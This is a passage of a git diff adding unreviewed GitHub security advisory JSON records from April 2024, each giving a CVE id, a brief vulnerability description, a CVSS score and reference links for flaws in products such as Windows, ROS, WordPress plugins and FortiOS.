"GHSA-8ppm-mwhc-2h38", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29053" + ], + "details": "Microsoft Defender for IoT Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29053" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29053" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-36" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8prr-f8pg-7r49/GHSA-8prr-f8pg-7r49.json b/advisories/unreviewed/2024/04/GHSA-8prr-f8pg-7r49/GHSA-8prr-f8pg-7r49.json new file mode 100644 index 00000000000..06b6d374534 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8prr-f8pg-7r49/GHSA-8prr-f8pg-7r49.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8prr-f8pg-7r49", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-30726" + ], + "details": "A shell injection vulnerability was discovered in ROS (Robot Operating System) Kinetic Kame in ROS_VERSION 1 and ROS_ PYTHON_VERSION 3, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information due to the way ROS handles shell command execution in components like command interpreters or interfaces that process external inputs.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30726" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30726" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T04:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8q39-5ffw-53hw/GHSA-8q39-5ffw-53hw.json b/advisories/unreviewed/2024/04/GHSA-8q39-5ffw-53hw/GHSA-8q39-5ffw-53hw.json new file mode 100644 index 00000000000..c42a4ae112e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8q39-5ffw-53hw/GHSA-8q39-5ffw-53hw.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8q39-5ffw-53hw", + "modified": "2024-04-09T09:31:10Z", + "published": "2024-04-09T09:31:10Z", + "aliases": [ + "CVE-2024-30695" + ], + "details": "An issue was discovered in the default configurations of ROS2 Galactic Geochelone versions ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows unauthenticated attackers to gain access using default credentials.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30695" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30695" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8qhf-fjfw-g5r8/GHSA-8qhf-fjfw-g5r8.json b/advisories/unreviewed/2024/04/GHSA-8qhf-fjfw-g5r8/GHSA-8qhf-fjfw-g5r8.json new file mode 100644 index 00000000000..308768c0c73 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8qhf-fjfw-g5r8/GHSA-8qhf-fjfw-g5r8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8qhf-fjfw-g5r8", + "modified": "2024-04-09T03:30:53Z", + "published": "2024-04-09T03:30:53Z", + "aliases": [ + "CVE-2024-2975" + ], + "details": "A race condition was identified through which privilege escalation was possible in certain configurations.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2975" + }, + { + "type": "WEB", + "url": "https://advisories.octopus.com/post/2024/sa2024-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8qwf-p858-gvg4/GHSA-8qwf-p858-gvg4.json b/advisories/unreviewed/2024/04/GHSA-8qwf-p858-gvg4/GHSA-8qwf-p858-gvg4.json new file mode 100644 index 00000000000..c39903eb5a8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8qwf-p858-gvg4/GHSA-8qwf-p858-gvg4.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8qwf-p858-gvg4", + "modified": "2024-04-08T15:30:33Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-31814" + ], + "details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 allows attackers to bypass login through the Form_Login function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31814" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/Login_Bypass/bypass.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8r74-7v79-2c2q/GHSA-8r74-7v79-2c2q.json b/advisories/unreviewed/2024/04/GHSA-8r74-7v79-2c2q/GHSA-8r74-7v79-2c2q.json new file mode 100644 index 00000000000..6864ce75526 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8r74-7v79-2c2q/GHSA-8r74-7v79-2c2q.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8r74-7v79-2c2q", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2198" + ], + "details": "The Contact Form by BestWebSoft plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘cntctfrm_contact_address’ parameter in all versions up to, and including, 4.2.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2198" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3047840/contact-form-plugin" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5eb66ca3-768e-4d8c-a0fa-74e78250aee3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8vf8-r7rr-h923/GHSA-8vf8-r7rr-h923.json b/advisories/unreviewed/2024/04/GHSA-8vf8-r7rr-h923/GHSA-8vf8-r7rr-h923.json new file mode 100644 index 00000000000..eb8c73d3954 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8vf8-r7rr-h923/GHSA-8vf8-r7rr-h923.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vf8-r7rr-h923", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26205" + ], + "details": "Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26205" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26205" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8vgx-r4c9-cvmm/GHSA-8vgx-r4c9-cvmm.json b/advisories/unreviewed/2024/04/GHSA-8vgx-r4c9-cvmm/GHSA-8vgx-r4c9-cvmm.json new file mode 100644 index 00000000000..6b7cc54118b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8vgx-r4c9-cvmm/GHSA-8vgx-r4c9-cvmm.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vgx-r4c9-cvmm", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2023-52386" + ], + "details": "Out-of-bounds write vulnerability in the RSMC module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52386" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8vjg-37gr-gvx7/GHSA-8vjg-37gr-gvx7.json b/advisories/unreviewed/2024/04/GHSA-8vjg-37gr-gvx7/GHSA-8vjg-37gr-gvx7.json new file mode 100644 index 00000000000..9e583340053 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8vjg-37gr-gvx7/GHSA-8vjg-37gr-gvx7.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vjg-37gr-gvx7", + "modified": "2024-04-08T06:31:30Z", + "published": "2024-04-08T06:31:30Z", + "aliases": [ + "CVE-2024-27488" + ], + "details": "Incorrect Access Control vulnerability in ZLMediaKit versions 1.0 through 8.0, allows remote attackers to escalate privileges and obtain sensitive information. The application system enables the http API interface by default and uses the secret parameter method to authenticate the http restful api interface, but the secret is hardcoded by default.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27488" + }, + { + "type": "WEB", + "url": "https://gist.github.com/tr4pmaker/44442d6f068458175213f4ba71da1312" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T06:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8wpf-4vhf-jhmg/GHSA-8wpf-4vhf-jhmg.json b/advisories/unreviewed/2024/04/GHSA-8wpf-4vhf-jhmg/GHSA-8wpf-4vhf-jhmg.json new file mode 100644 index 00000000000..cad11186f84 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8wpf-4vhf-jhmg/GHSA-8wpf-4vhf-jhmg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8wpf-4vhf-jhmg", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1794" + ], + "details": "The Forminator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an uploaded file (e.g. 3gpp file) in all versions up to, and including, 1.29.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1794" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3047085%40forminator&old=3028842%40forminator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/23feb72c-7e6f-436b-b56e-dc6185302d31?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9265-rqwh-6m4g/GHSA-9265-rqwh-6m4g.json b/advisories/unreviewed/2024/04/GHSA-9265-rqwh-6m4g/GHSA-9265-rqwh-6m4g.json new file mode 100644 index 00000000000..d7f03658c7a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9265-rqwh-6m4g/GHSA-9265-rqwh-6m4g.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9265-rqwh-6m4g", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-6694" + ], + "details": "The Beaver Themer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping on user supplied custom fields. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6694" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b8428a92-8b0a-4a9a-8f7e-571c252973c2?source=cve" + }, + { + "type": "WEB", + "url": "https://www.wpbeaverbuilder.com/change-logs" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-92jm-8w24-5mvr/GHSA-92jm-8w24-5mvr.json b/advisories/unreviewed/2024/04/GHSA-92jm-8w24-5mvr/GHSA-92jm-8w24-5mvr.json new file mode 100644 index 00000000000..dde11b44fd2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-92jm-8w24-5mvr/GHSA-92jm-8w24-5mvr.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-92jm-8w24-5mvr", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-1041" + ], + "details": "The WP Radio – Worldwide Online Radio Stations Directory for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's settings in all versions up to, and including, 3.1.9 due to insufficient input sanitization and output escaping as well as insufficient access control on the settings. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1041" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/wp-radio" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/486ffdc9-a3e7-4f4c-89b1-b668a5d41aa5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-92rg-x2hq-jc97/GHSA-92rg-x2hq-jc97.json b/advisories/unreviewed/2024/04/GHSA-92rg-x2hq-jc97/GHSA-92rg-x2hq-jc97.json new file mode 100644 index 00000000000..09ac5e95ebf --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-92rg-x2hq-jc97/GHSA-92rg-x2hq-jc97.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-92rg-x2hq-jc97", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-3354" + ], + "details": "A vulnerability was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. It has been classified as critical. Affected is an unknown function of the file admin/mod_users/index.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-259458 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3354" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-07" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259458" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259458" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310222" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-93gm-4q6q-xv6c/GHSA-93gm-4q6q-xv6c.json b/advisories/unreviewed/2024/04/GHSA-93gm-4q6q-xv6c/GHSA-93gm-4q6q-xv6c.json new file mode 100644 index 00000000000..b57c401d2b8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-93gm-4q6q-xv6c/GHSA-93gm-4q6q-xv6c.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-93gm-4q6q-xv6c", + "modified": "2024-04-08T15:30:32Z", + "published": "2024-04-08T15:30:32Z", + "aliases": [ + "CVE-2011-10006" + ], + "details": "A vulnerability was found in GamerZ WP-PostRatings up to 1.64. It has been classified as problematic. This affects an unknown part of the file wp-postratings.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.65 is able to address this issue. The identifier of the patch is 6182a5682b12369ced0becd3b505439ce2eb8132. It is recommended to upgrade the affected component. The identifier VDB-259629 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10006" + }, + { + "type": "WEB", + "url": "https://github.com/wp-plugins/wp-postratings/commit/6182a5682b12369ced0becd3b505439ce2eb8132" + }, + { + "type": "WEB", + "url": "https://github.com/wp-plugins/wp-postratings/commit/dcc68d03693152eba14d6fb33ba42528ff60e06a" + }, + { + "type": "WEB", + "url": "https://github.com/wp-plugins/wp-postratings/releases/tag/1.65" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259629" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259629" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-93p2-rq72-j8qp/GHSA-93p2-rq72-j8qp.json b/advisories/unreviewed/2024/04/GHSA-93p2-rq72-j8qp/GHSA-93p2-rq72-j8qp.json new file mode 100644 index 00000000000..07e44938572 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-93p2-rq72-j8qp/GHSA-93p2-rq72-j8qp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-93p2-rq72-j8qp", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-31366" + ], + "details": "Missing Authorization vulnerability in Themify Post Type Builder (PTB).This issue affects Post Type Builder (PTB): from n/a through 2.0.8.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31366" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/themify-ptb/wordpress-post-type-builder-ptb-plugin-2-0-8-subscriber-arbitrary-post-page-creation-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T08:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-93p8-27wh-j7p2/GHSA-93p8-27wh-j7p2.json b/advisories/unreviewed/2024/04/GHSA-93p8-27wh-j7p2/GHSA-93p8-27wh-j7p2.json new file mode 100644 index 00000000000..840482200cb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-93p8-27wh-j7p2/GHSA-93p8-27wh-j7p2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-93p8-27wh-j7p2", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28925" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28925" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28925" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-94vj-jcph-6x92/GHSA-94vj-jcph-6x92.json b/advisories/unreviewed/2024/04/GHSA-94vj-jcph-6x92/GHSA-94vj-jcph-6x92.json new file mode 100644 index 00000000000..1c008a492f5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-94vj-jcph-6x92/GHSA-94vj-jcph-6x92.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-94vj-jcph-6x92", + "modified": "2024-04-05T21:32:43Z", + "published": "2024-04-05T21:32:43Z", + "aliases": [ + "CVE-2024-29739" + ], + "details": "In tmu_get_temp_lut of tmu.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29739" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9669-pjx9-x524/GHSA-9669-pjx9-x524.json b/advisories/unreviewed/2024/04/GHSA-9669-pjx9-x524/GHSA-9669-pjx9-x524.json new file mode 100644 index 00000000000..d49fe054202 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9669-pjx9-x524/GHSA-9669-pjx9-x524.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9669-pjx9-x524", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-48784" + ], + "details": "A use of externally-controlled format string vulnerability [CWE-134] in FortiOS version 7.4.1 and below, version 7.2.7 and below, version 7.0.14 and below, version 6.4.15 and below command line interface may allow a local privileged attacker with super-admin profile and CLI access to execute arbitrary code or commands via specially crafted requests.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48784" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-413" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-134" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-966w-ff57-5w3f/GHSA-966w-ff57-5w3f.json b/advisories/unreviewed/2024/04/GHSA-966w-ff57-5w3f/GHSA-966w-ff57-5w3f.json new file mode 100644 index 00000000000..3e0184d88f7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-966w-ff57-5w3f/GHSA-966w-ff57-5w3f.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-966w-ff57-5w3f", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-1960" + ], + "details": "The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +12 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Special Offer Day Widget Banner Link in all versions up to, and including, 2.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1960" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/includes/addons/special_day_offer.php#L784" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/includes/addons/special_day_offer.php#L805" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3044764/woolentor-addons/tags/2.8.2/includes/addons/special_day_offer.php?old=2704778&old_path=woolentor-addons/trunk/includes/addons/special_day_offer.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/32b70801-d80f-40dc-8321-e12ac0b8c695?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9726-4j22-xm36/GHSA-9726-4j22-xm36.json b/advisories/unreviewed/2024/04/GHSA-9726-4j22-xm36/GHSA-9726-4j22-xm36.json new file mode 100644 index 00000000000..fc0745059ba --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9726-4j22-xm36/GHSA-9726-4j22-xm36.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9726-4j22-xm36", + "modified": "2024-04-06T12:30:56Z", + "published": "2024-04-06T12:30:56Z", + "aliases": [ + "CVE-2024-22328" + ], + "details": "IBM Maximo Application Suite 8.10 and 8.11 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 279950.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22328" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/279950" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7147543" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T12:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-975v-wj6r-fgj8/GHSA-975v-wj6r-fgj8.json 